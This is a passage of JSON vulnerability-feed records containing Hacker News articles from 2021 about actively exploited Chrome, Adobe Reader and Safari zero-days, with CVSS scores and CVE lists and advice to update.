"[](<https://thehackernews.com/images/--v2cn8JGV00/YMGRd9cFvrI/AAAAAAAACz4/i5Stk6m4GEgwbul82T6lZeEbdMMNfofJQCLcBGAsYHQ/s0/chrome-zero-day-vulnerability.jpg>)\n\nAttention readers, if you are using Google Chrome browser on your Windows, Mac, or Linux computers, you need to update it immediately to the latest version Google released earlier today.\n\nThe internet services company has rolled out an urgent update to the browser to address 14 newly discovered security issues, including a zero-day flaw that it says is being actively exploited in the wild.\n\nTracked as [CVE-2021-30551](<https://chromereleases.googleblog.com/2021/06/stable-channel-update-for-desktop.html>), the vulnerability stems from a type confusion issue in its V8 open-source and JavaScript engine. Sergei Glazunov of Google Project Zero has been credited with discovering and reporting the flaw.\n\nAlthough the search giant's Chrome team issued a terse statement acknowledging \"an exploit for CVE-2021-30551 exists in the wild,\" Shane Huntley, Director of Google's Threat Analysis Group, [hinted](<https://twitter.com/ShaneHuntley/status/1402712986289016835>) that the vulnerability was leveraged by the same actor that abused [CVE-2021-33742](<https://thehackernews.com/2021/06/update-your-windows-computers-to-patch.html>), an actively exploited remote code execution flaw in Windows MSHTML platform that was addressed by Microsoft as part of its Patch Tuesday update on June 8.\n\n[](<https://thehackernews.com/images/-XI4fkisfDp0/YMGPq0RtpKI/AAAAAAAACzw/d0mpshr20nw2j--sOXxBrrTJIj2IP95ewCLcBGAsYHQ/s0/chrome-zero-day.jpg>)\n\nThe two zero-days are said to have been provided by a commercial exploit broker to a nation-state actor, which used them in limited attacks against targets in Eastern Europe and the Middle East, Huntley said.\n\nMore technical details about the nature of the attacks are to be released in the coming weeks so as to allow a majority of the users to install the update and prevent other threat 
actors from creating exploits targeting the flaw.\n\nWith the latest fix, Google has addressed a total of seven zero-days in Chrome since the start of the year \u2014\n\n * [**CVE-2021-21148**](<https://thehackernews.com/2021/02/new-chrome-browser-0-day-under-active.html>) \\- Heap buffer overflow in V8\n * [**CVE-2021-21166**](<https://thehackernews.com/2021/03/new-chrome-0-day-bug-under-active.html>) \\- Object recycle issue in audio\n * [**CVE-2021-21193**](<https://thehackernews.com/2021/03/another-google-chrome-0-day-bug-found.html>) \\- Use-after-free in Blink\n * [**CVE-2021-21206**](<https://thehackernews.com/2021/04/2-new-chrome-0-days-under-attack-update.html>) \\- Use-after-free in Blink\n * [**CVE-2021-21220**](<https://thehackernews.com/2021/04/2-new-chrome-0-days-under-attack-update.html>) \\- Insufficient validation of untrusted input in V8 for x86_64\n * [**CVE-2021-21224**](<https://thehackernews.com/2021/04/update-your-chrome-browser-immediately.html>) \\- Type confusion in V8\n\nChrome users can update to the latest version (91.0.4472.101) by heading to Settings > Help > About Google Chrome to mitigate the risk associated with the flaw.\n\n \n\n\nFound this article interesting? 
Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-06-10T04:14:00", "type": "thn", "title": "New Chrome 0-Day Bug Under Active Attacks \u2013 Update Your Browser ASAP!", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21148", "CVE-2021-21166", "CVE-2021-21193", "CVE-2021-21206", "CVE-2021-21220", "CVE-2021-21224", "CVE-2021-30551", "CVE-2021-33742"], "modified": "2021-06-10T10:25:50", "id": "THN:7D7C05739ECD847B8CDEEAF930C51BF8", "href": "https://thehackernews.com/2021/06/new-chrome-0-day-bug-under-active.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:38:03", "description": "[](<https://thehackernews.com/images/-pHacbifc0bM/YJtLaUVqNrI/AAAAAAAAChE/JQZWUxanHVEGGJy94zJWtnW3s6teGne7ACLcBGAsYHQ/s0/adobe.jpg>)\n\nAdobe has released [Patch Tuesday updates](<https://helpx.adobe.com/security.html>) for the month of 
May with fixes for multiple vulnerabilities spanning 12 different products, including a zero-day flaw affecting Adobe Reader that's actively exploited in the wild.\n\nThe list of updated applications includes [Adobe Experience Manager](<https://helpx.adobe.com/security/products/experience-manager/apsb21-15.html>), [Adobe InDesign](<https://helpx.adobe.com/security/products/indesign/apsb21-22.html>), [Adobe Illustrator](<https://helpx.adobe.com/security/products/illustrator/apsb21-24.html>), [Adobe InCopy](<https://helpx.adobe.com/security/products/incopy/apsb21-25.html>), [Adobe Genuine Service](<https://helpx.adobe.com/security/products/integrity_service/apsb21-27.html>), Adobe Acrobat and Reader, [Magento](<https://helpx.adobe.com/security/products/magento/apsb21-30.html>), Adobe [Creative Cloud Desktop](<https://helpx.adobe.com/security/products/creative-cloud/apsb21-31.html>) Application, Adobe [Media Encoder](<https://helpx.adobe.com/security/products/media-encoder/apsb21-32.html>), Adobe [After Effects](<https://helpx.adobe.com/security/products/after_effects/apsb21-33.html>), Adobe Medium, and Adobe Animate.\n\nIn a security bulletin, the company [acknowledged](<https://helpx.adobe.com/security/products/acrobat/apsb21-29.html>) it received reports that the flaw \"has been exploited in the wild in limited attacks targeting Adobe Reader users on Windows.\" Tracked as CVE-2021-28550, the zero-day concerns an arbitrary code execution flaw that could allow adversaries to execute virtually any command on target systems.\n\n[](<https://thehackernews.com/images/-bGxPAhAwfTI/YJtpVB2NOSI/AAAAAAAAChM/kjgbRzSnNbkEbGKd5h6QkhcEM_bQMjrdgCLcBGAsYHQ/s0/adobe.jpg>)\n\nWhile the targeted attacks took aim at Windows users of Adobe Reader, the issue affects both Windows and macOS versions of Acrobat DC, Acrobat Reader DC, Acrobat 2020, Acrobat Reader 2020, Acrobat 2017, and Acrobat Reader 2017. 
An anonymous researcher has been credited with reporting the vulnerability.\n\n10 critical and four important vulnerabilities were addressed in Adobe Acrobat and Reader, followed by remediation for five critical flaws (CVE-2021-21101-CVE-2021-21105) in Adobe Illustrator that could lead to arbitrary code execution in the context of the current user. Adobe credited Kushal Arvind Shah of Fortinet's FortiGuard Labs with reporting three of the five vulnerabilities.\n\nIn all, a total of 43 security weaknesses have been resolved in Tuesday's update. Users are advised to update their software installations to the latest versions to mitigate the risk associated with the flaws.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-05-12T05:41:00", "type": "thn", "title": "Alert: Hackers Exploit Adobe Reader 0-Day Vulnerability in the Wild", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": 
false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21101", "CVE-2021-21105", "CVE-2021-28550"], "modified": "2021-05-12T06:42:13", "id": "THN:8243BE07E124CAD984B8B4895550A7CC", "href": "https://thehackernews.com/2021/05/alert-hackers-exploit-adobe-reader-0.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:38:19", "description": "[](<https://thehackernews.com/images/-wb_mRqoRlJs/YH_fh-jU73I/AAAAAAAACUg/PjdPBbIeXIQL_vuc_D3kAe7us4v9piwdwCLcBGAsYHQ/s0/chrome-update.jpg>)\n\nGoogle on Tuesday released an update for Chrome web browser for Windows, Mac, and Linux, with a total of seven security fixes, including one flaw for which it says an exploit exists in the wild.\n\nTracked as **CVE-2021-21224**, the flaw concerns a type confusion vulnerability in V8 open-source JavaScript engine that was reported to the company by security researcher Jose Martinez on April 5\n\nAccording to security researcher [Lei Cao](<https://iamelli0t.github.io/2021/04/20/Chromium-Issue-1196683-1195777.html#rca-of-issue-1195777>), the bug [[1195777](<https://bugs.chromium.org/p/chromium/issues/detail?id=1195777>)] is triggered when performing integer data type conversion, resulting in an out-of-bounds condition that could be used to achieve arbitrary memory read/write primitive.\n\n\"Google is aware of reports that exploits for CVE-2021-21224 exist in the wild,\" Chrome's Technical Program Manager Srinivas Sista [said](<https://chromereleases.googleblog.com/2021/04/stable-channel-update-for-desktop_20.html>) in a blog post.\n\n[](<https://thehackernews.com/images/-MqsPXUEBIAs/YH_gSVGkWZI/AAAAAAAACUw/ZOCKPD3LhzYIiPehN7StsViTVlFaKHhyACLcBGAsYHQ/s0/chrome-code.jpg>)\n\nThe update comes after proof-of-concept (PoC) [code](<https://noahblog.360.cn/chromium_v8_remote_code_execution_vulnerability_analysis/>) exploiting the flaw published by a researcher named \"[frust](<https://twitter.com/frust93717815/status/1382301769577861123>)\" emerged on 
April 14 by taking advantage of the fact that the issue was addressed in the [V8 source code](<https://chromium-review.googlesource.com/c/v8/v8/+/2826114/3/src/compiler/representation-change.cc>), but the patch was not integrated into the Chromium codebase and all the browsers that rely on it, such as Chrome, Microsoft Edge, Brave, Vivaldi, and Opera.\n\nThe one-week patch gap meant the browsers were vulnerable to attacks until the patches posted in the open-source code repository were released as a stable update.\n\nIt's worth noting that Google [halved](<https://groups.google.com/a/chromium.org/g/security-dev/c/fbiuFbW07vI>) the median \"patch gap\" from 33 days in Chrome 76 to 15 days in Chrome 78, which was released in October 2019, thereby pushing severe security fixes every two weeks.\n\nThe latest set of fixes also arrive close on the heels of an update the search giant rolled out [last week](<https://thehackernews.com/2021/04/2-new-chrome-0-days-under-attack-update.html>) with [patches for two security vulnerabilities](<https://thehackernews.com/2021/04/2-new-chrome-0-days-under-attack-update.html>) CVE-2021-21206 and CVE-2021-21220, the latter of which was demonstrated at the Pwn2Own [2021 hacking](<https://thehackernews.com/hacker/>) contest earlier this month.\n\nChrome 90.0.4430.85 is expected to roll out in the coming days. Users can update to the latest version by heading to Settings > Help > About Google Chrome to mitigate the risk associated with the flaws.\n\n \n\n\nFound this article interesting? 
Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-04-21T08:20:00", "type": "thn", "title": "Update Your Chrome Browser ASAP to Patch a Week Old Public Exploit", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21206", "CVE-2021-21220", "CVE-2021-21224"], "modified": "2021-04-21T08:30:40", "id": "THN:FF8DAEC0AE0DDAE827D57407C51BE992", "href": "https://thehackernews.com/2021/04/update-your-chrome-browser-immediately.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:39:21", "description": "[](<https://thehackernews.com/images/-xmPJ5TMTpac/YO_wfpf1LkI/AAAAAAAADM4/xSKsZYAbLBYJjYvNQilqUM9z0lf0Rx7_gCLcBGAsYHQ/s0/chrome.jpg>)\n\nThreat intelligence researchers from Google on Wednesday [shed more light](<https://blog.google/threat-analysis-group/how-we-protect-users-0-day-attacks/>) on four in-the-wild zero-days in 
Chrome, Safari, and Internet Explorer browsers that were exploited by malicious actors in different campaigns since the start of the year.\n\nWhat's more, three of the four zero-days were engineered by commercial providers and sold to and used by government-backed actors, contributing to an uptick in real-world attacks. The list of now-patched vulnerabilities is as follows -\n\n * [**CVE-2021-1879**](<https://thehackernews.com/2021/03/apple-issues-urgent-patch-update-for.html>): Use-After-Free in QuickTimePluginReplacement (Apple WebKit)\n * [**CVE-2021-21166**](<https://thehackernews.com/2021/03/new-chrome-0-day-bug-under-active.html>): Chrome Object Lifecycle Issue in Audio\n * [**CVE-2021-30551**](<https://thehackernews.com/2021/06/new-chrome-0-day-bug-under-active.html>): Chrome Type Confusion in V8\n * [**CVE-2021-33742**](<https://thehackernews.com/2021/06/update-your-windows-computers-to-patch.html>): Internet Explorer out-of-bounds write in MSHTML\n\nBoth Chrome zero-days \u2014 CVE-2021-21166 and CVE-2021-30551 \u2014 are believed to have been used by the same actor, and were delivered as one-time links sent via email to targets located in Armenia, with the links redirecting unsuspecting users to attacker-controlled domains that masqueraded as legitimate websites of interest to the recipients.\n\nThe malicious websites took charge of fingerprinting the devices, including collecting system information about the clients, before delivering a second-stage payload.\n\nWhen Google rolled out a patch for CVE-2021-30551, Shane Huntley, Director of Google's Threat Analysis Group (TAG), revealed that the vulnerability was leveraged by the same actor that abused CVE-2021-33742, an actively exploited remote code execution flaw in Windows MSHTML platform that was addressed by Microsoft as part of its [Patch Tuesday update](<https://thehackernews.com/2021/06/update-your-windows-computers-to-patch.html>) on June 8.\n\nThe two zero-days were provided by a commercial 
exploit broker to a nation-state adversary, which used them in limited attacks against targets in Eastern Europe and the Middle East, Huntley previously added.\n\n[](<https://thehackernews.com/images/--ol-CfJ3-bE/YO_tDkpfuNI/AAAAAAAADMw/bonGU0wpX_QzAsMNe5_Eh_0_Nb4OAma_QCLcBGAsYHQ/s0/zero-day.jpg>)\n\nNow according to a technical report published by the team, all the three zero-days were \"developed by the same commercial surveillance company that sold these capabilities to two different government-backed actors,\" adding the Internet Explorer flaw was used in a campaign targeting Armenian users with malicious Office documents that loaded web content within the web browser.\n\nGoogle did not disclose the identities of the exploit broker or the two threat actors that used the vulnerabilities as part of their attacks.\n\n## SolarWinds Hackers Exploited iOS Zero-Day\n\nThe Safari zero-day, in contrast, concerned a WebKit flaw that could enable adversaries to process maliciously crafted web content that may result in universal cross-site scripting attacks. 
The issue was rectified by Apple on March 26, 2021.\n\nAttacks leveraging CVE-2021-1879, which Google attributed to a \"likely Russian government-backed actor,\" were executed by means of sending malicious links to government officials over LinkedIn that, when clicked from an iOS device, redirected the user to a rogue domain that served the next-stage payloads.\n\nIt's worth noting that the offensive also mirrors a [wave of targeted attacks](<https://thehackernews.com/2021/05/solarwinds-hackers-target-think-tanks.html>) unleashed by Russian hackers tracked as Nobelium, which was found abusing the vulnerability to strike government agencies, think tanks, consultants, and non-governmental organizations as part of an email phishing campaign.\n\nNobelium, a threat actor linked to the Russian Foreign Intelligence Service (SVR), is also suspected of orchestrating the [SolarWinds supply chain attack](<https://thehackernews.com/2020/12/us-agencies-and-fireeye-were-hacked.html>) late last year. It's known by other aliases such as APT29, UNC2452 (FireEye), SolarStorm (Unit 42), StellarParticle (Crowdstrike), Dark Halo (Volexity), and Iron Ritual (Secureworks).\n\n\"Halfway into 2021, there have been [33 zero-day exploits](<https://googleprojectzero.github.io/0days-in-the-wild/rca.html>) used in attacks that have been publicly disclosed this year \u2014 11 more than the total number from 2020,\" TAG researchers Maddie Stone and Clement Lecigne noted. \"While there is an increase in the number of zero-day exploits being used, we believe greater detection and disclosure efforts are also contributing to the upward trend.\"\n\n \n\n\nFound this article interesting? 
Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-07-15T08:25:00", "type": "thn", "title": "Google Details iOS, Chrome, IE Zero-Day Flaws Exploited Recently in the Wild", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1879", "CVE-2021-21166", "CVE-2021-30551", "CVE-2021-33742"], "modified": "2021-07-15T12:45:33", "id": "THN:BBBFDA7EEE18F813A5DA572FD390D528", "href": "https://thehackernews.com/2021/07/google-details-ios-chrome-ie-zero-day.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:39:20", "description": "[](<https://thehackernews.com/images/--Br-zb7NQb0/YPEUTqMvgsI/AAAAAAAADNw/cesEHjkHFKgyqC_MTP_ji5iUXUCeqoH1QCLcBGAsYHQ/s0/chrome-update.jpg>)\n\nGoogle has pushed out a new security update to Chrome browser for Windows, Mac, and Linux with multiple fixes, including a zero-day that it says is being 
exploited in the wild.\n\nThe latest patch resolves a total of eight issues, one of which concerns a type confusion issue in its V8 open-source and JavaScript engine ([CVE-2021-30563](<https://chromereleases.googleblog.com/2021/07/stable-channel-update-for-desktop.html>)). The search giant credited an anonymous researcher for reporting the flaw on July 12.\n\nAs is usually the case with actively exploited flaws, the company issued a terse statement acknowledging that \"an exploit for CVE-2021-30563 exists in the wild\" while refraining from sharing full details about the underlying vulnerability used in the attacks due to its serious nature and the possibility that doing so could lead to further abuse.\n\nCVE-2021-30563 also marks the ninth zero-day addressed by Google to combat real-world attacks against Chrome users since the start of the year \u2014\n\n * [**CVE-2021-21148**](<https://thehackernews.com/2021/02/new-chrome-browser-0-day-under-active.html>) \\- Heap buffer overflow in V8\n * [**CVE-2021-21166**](<https://thehackernews.com/2021/03/new-chrome-0-day-bug-under-active.html>) \\- Object recycle issue in audio\n * [**CVE-2021-21193**](<https://thehackernews.com/2021/03/another-google-chrome-0-day-bug-found.html>) \\- Use-after-free in Blink\n * [**CVE-2021-21206**](<https://thehackernews.com/2021/04/2-new-chrome-0-days-under-attack-update.html>) \\- Use-after-free in Blink\n * [**CVE-2021-21220**](<https://thehackernews.com/2021/04/2-new-chrome-0-days-under-attack-update.html>) \\- Insufficient validation of untrusted input in V8 for x86_64\n * [**CVE-2021-21224**](<https://thehackernews.com/2021/04/update-your-chrome-browser-immediately.html>) \\- Type confusion in V8\n * [**CVE-2021-30551**](<https://thehackernews.com/2021/06/new-chrome-0-day-bug-under-active.html>) \\- Type confusion in V8\n * [**CVE-2021-30554**](<https://thehackernews.com/2021/06/update-your-chrome-browser-to-patch-yet.html>) \\- Use-after-free in WebGL\n\nChrome users are advised to 
update to the latest version (91.0.4472.164) by heading to Settings > Help > 'About Google Chrome' to mitigate the risk associated with the flaw.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-07-16T05:08:00", "type": "thn", "title": "Update Your Chrome Browser to Patch New Zero\u2011Day Bug Exploited in the Wild", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21148", "CVE-2021-21166", "CVE-2021-21193", "CVE-2021-21206", "CVE-2021-21220", "CVE-2021-21224", "CVE-2021-30551", "CVE-2021-30554", "CVE-2021-30563"], "modified": "2021-07-16T05:08:47", "id": "THN:C736174C6B0ADC38AA88BC58F30271DA", "href": "https://thehackernews.com/2021/07/update-your-chrome-browser-to-patch-new.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:37:19", "description": 
"[](<https://thehackernews.com/images/-FOgCdN3CSOk/YUAgGS1bB1I/AAAAAAAADyc/2oKkq_Mon1AnpsrRVosSNgmXm6ZdbQTXACLcBGAsYHQ/s0/chrome-update.jpg>)\n\nGoogle on Monday released security updates for Chrome web browser to address a total of 11 security issues, two of which it says are actively exploited zero-days in the wild.\n\nTracked as **CVE-2021-30632** and **CVE-2021-30633**, the [vulnerabilities](<https://chromereleases.googleblog.com/2021/09/stable-channel-update-for-desktop.html>) concern an out of bounds write in V8 JavaScript engine and a use after free flaw in Indexed DB API respectively, with the internet giant crediting anonymous researchers for reporting the bugs on September 8.\n\nAs is typically the case, the company said it's \"aware that exploits for CVE-2021-30632 and CVE-2021-30633 exist in the wild\" without sharing additional specifics about how, when, and where the vulnerabilities were exploited, or the threat actors that may be abusing them.\n\nWith these two security shortcomings, Google has addressed a total of 11 zero-day vulnerabilities in Chrome since the start of the year \u2014\n\n * [**CVE-2021-21148**](<https://thehackernews.com/2021/02/new-chrome-browser-0-day-under-active.html>) \\- Heap buffer overflow in V8\n * [**CVE-2021-21166**](<https://thehackernews.com/2021/03/new-chrome-0-day-bug-under-active.html>) \\- Object recycle issue in audio\n * [**CVE-2021-21193**](<https://thehackernews.com/2021/03/another-google-chrome-0-day-bug-found.html>) \\- Use-after-free in Blink\n * [**CVE-2021-21206**](<https://thehackernews.com/2021/04/2-new-chrome-0-days-under-attack-update.html>) \\- Use-after-free in Blink\n * [**CVE-2021-21220**](<https://thehackernews.com/2021/04/2-new-chrome-0-days-under-attack-update.html>) \\- Insufficient validation of untrusted input in V8 for x86_64\n * [**CVE-2021-21224**](<https://thehackernews.com/2021/04/update-your-chrome-browser-immediately.html>) \\- Type confusion in V8\n * 
[**CVE-2021-30551**](<https://thehackernews.com/2021/06/new-chrome-0-day-bug-under-active.html>) \\- Type confusion in V8\n * [**CVE-2021-30554**](<https://thehackernews.com/2021/06/update-your-chrome-browser-to-patch-yet.html>) \\- Use-after-free in WebGL\n * [**CVE-2021-30563**](<https://thehackernews.com/2021/07/update-your-chrome-browser-to-patch-new.html>) \\- Type confusion in V8\n\nChrome users are advised to update to the latest version (93.0.4577.82) for Windows, Mac, and Linux by heading to Settings > Help > 'About Google Chrome' to mitigate the risk associated with the flaws.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.6, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 6.0}, "published": "2021-09-14T04:08:00", "type": "thn", "title": "Update Google Chrome to Patch 2 New Zero-Day Flaws Under Attack", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21148", "CVE-2021-21166", 
"CVE-2021-21193", "CVE-2021-21206", "CVE-2021-21220", "CVE-2021-21224", "CVE-2021-30551", "CVE-2021-30554", "CVE-2021-30563", "CVE-2021-30632", "CVE-2021-30633"], "modified": "2021-09-19T08:13:46", "id": "THN:1A836FDDE57334BC4DAFA65E6DFA02E4", "href": "https://thehackernews.com/2021/09/update-google-chrome-to-patch-2-new.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:37:16", "description": "[](<https://thehackernews.com/images/-EBTuV2RF5wo/YU6_b4n3Y4I/AAAAAAAAD5w/Rv4cfNWgTzsitUR4O-m9Hoo5Jsb-IyxJACLcBGAsYHQ/s0/chrome-update.jpg>)\n\nGoogle on Friday rolled out an emergency security patch to its Chrome web browser to address a security flaw that's known to have an exploit in the wild.\n\nTracked as [CVE-2021-37973](<https://chromereleases.googleblog.com/2021/09/stable-channel-update-for-desktop_24.html>), the vulnerability has been described as [use after free](<https://cwe.mitre.org/data/definitions/416.html>) in [Portals API](<https://web.dev/hands-on-portals/>), a web page navigation system that enables a page to show another page as an inset and \"perform a seamless transition to a new state, where the formerly-inset page becomes the top-level document.\"\n\nCl\u00e9ment Lecigne of Google Threat Analysis Group (TAG) has been credited with reporting the flaw. 
Additional specifics pertaining to the weakness have not been disclosed in light of active exploitation and to allow a majority of the users to apply the patch, but the internet giant said it's \"aware that an exploit for CVE-2021-37973 exists in the wild.\"\n\nThe update arrives a day after Apple moved to close an actively exploited security hole in older versions of iOS and macOS ([CVE-2021-30869](<https://thehackernews.com/2021/09/urgent-apple-ios-and-macos-updates.html>)), which the TAG noted as being \"used in conjunction with a N-day remote code execution targeting WebKit.\" With the latest fix, Google has addressed a total of [12 zero-day flaws in Chrome](<https://thehackernews.com/2021/09/update-google-chrome-to-patch-2-new.html>) since the start of 2021:\n\n * [CVE-2021-21148](<https://thehackernews.com/2021/02/new-chrome-browser-0-day-under-active.html>) \\- Heap buffer overflow in V8\n * [CVE-2021-21166](<https://thehackernews.com/2021/03/new-chrome-0-day-bug-under-active.html>) \\- Object recycle issue in audio\n * [CVE-2021-21193](<https://thehackernews.com/2021/03/another-google-chrome-0-day-bug-found.html>) \\- Use-after-free in Blink\n * [CVE-2021-21206](<https://thehackernews.com/2021/04/2-new-chrome-0-days-under-attack-update.html>) \\- Use-after-free in Blink\n * [CVE-2021-21220](<https://thehackernews.com/2021/04/2-new-chrome-0-days-under-attack-update.html>) \\- Insufficient validation of untrusted input in V8 for x86_64\n * [CVE-2021-21224](<https://thehackernews.com/2021/04/update-your-chrome-browser-immediately.html>) \\- Type confusion in V8\n * [CVE-2021-30551](<https://thehackernews.com/2021/06/new-chrome-0-day-bug-under-active.html>) \\- Type confusion in 